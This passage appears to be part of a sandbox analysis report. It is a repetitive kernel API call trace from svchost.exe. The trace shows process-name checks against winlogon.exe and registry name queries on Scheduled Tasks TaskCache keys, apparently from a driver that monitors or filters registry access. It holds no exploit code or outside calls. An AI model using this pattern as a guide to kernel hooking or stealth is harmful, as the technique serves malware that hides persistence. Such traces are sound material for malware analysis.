| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xc0, ret_val_ptr_out = 0xffffe0003a76e520 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xbe, ret_val_ptr_out = 0xffffe0003a782cc0 |
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0xbe, ObjectNameInfo_unk_out = 0xffffe0003a782cc0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782cc0, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76e520, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9f825d0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9f825d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xc0, ret_val_ptr_out = 0xffffe0003a76e520 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9f825d0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9f825d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xbe, ret_val_ptr_out = 0xffffe0003a782cc0 |
| ObQueryNameString | Object_ptr = 0xffffc000b9f825d0, Length = 0xbe, ObjectNameInfo_unk_out = 0xffffe0003a782cc0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782cc0, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76e520, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xc0, ret_val_ptr_out = 0xffffe0003a76e520 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xbe, ret_val_ptr_out = 0xffffe0003a782cc0 |
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0xbe, ObjectNameInfo_unk_out = 0xffffe0003a782cc0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782cc0, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76e520, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xc0, ret_val_ptr_out = 0xffffe0003a76e520 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xbe, ret_val_ptr_out = 0xffffe0003a782cc0 |
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0xbe, ObjectNameInfo_unk_out = 0xffffe0003a782cc0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782cc0, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76e520, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xc0, ret_val_ptr_out = 0xffffe0003a76e520 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xbe, ret_val_ptr_out = 0xffffe0003a782cc0 |
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0xbe, ObjectNameInfo_unk_out = 0xffffe0003a782cc0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782cc0, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76e520, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
Execution Path #156 (length: 1739, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 1739 |
Processes
»
| Process | Count |
|---|---|
| Process 10 (svchost.exe, PID: 1000) | 1 |
Sequence
»
| Symbol | Parameters | ||||
|---|---|---|---|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd4, ret_val_ptr_out = 0xffffe0003a76faa0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd2, ret_val_ptr_out = 0xffffe0003a782bd0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0xd2, ObjectNameInfo_unk_out = 0xffffe0003a782bd0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782bd0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x142, ret_val_ptr_out = 0xffffe0003a770eb0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x140, ret_val_ptr_out = 0xffffe0003a785ec0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x140, ObjectNameInfo_unk_out = 0xffffe0003a785ec0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\User_Feed_Synchronization-{447529D0-7CBF-4A66-92FE-00C87AC907BC}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\User_Feed_Synchronization-{447529D0-7CBF-4A66-92FE-00C87AC907BC} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785ec0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a770eb0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x142, ret_val_ptr_out = 0xffffe0003a770eb0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x140, ret_val_ptr_out = 0xffffe0003a785ec0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x140, ObjectNameInfo_unk_out = 0xffffe0003a785ec0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\User_Feed_Synchronization-{447529D0-7CBF-4A66-92FE-00C87AC907BC}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\User_Feed_Synchronization-{447529D0-7CBF-4A66-92FE-00C87AC907BC} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785ec0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a770eb0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
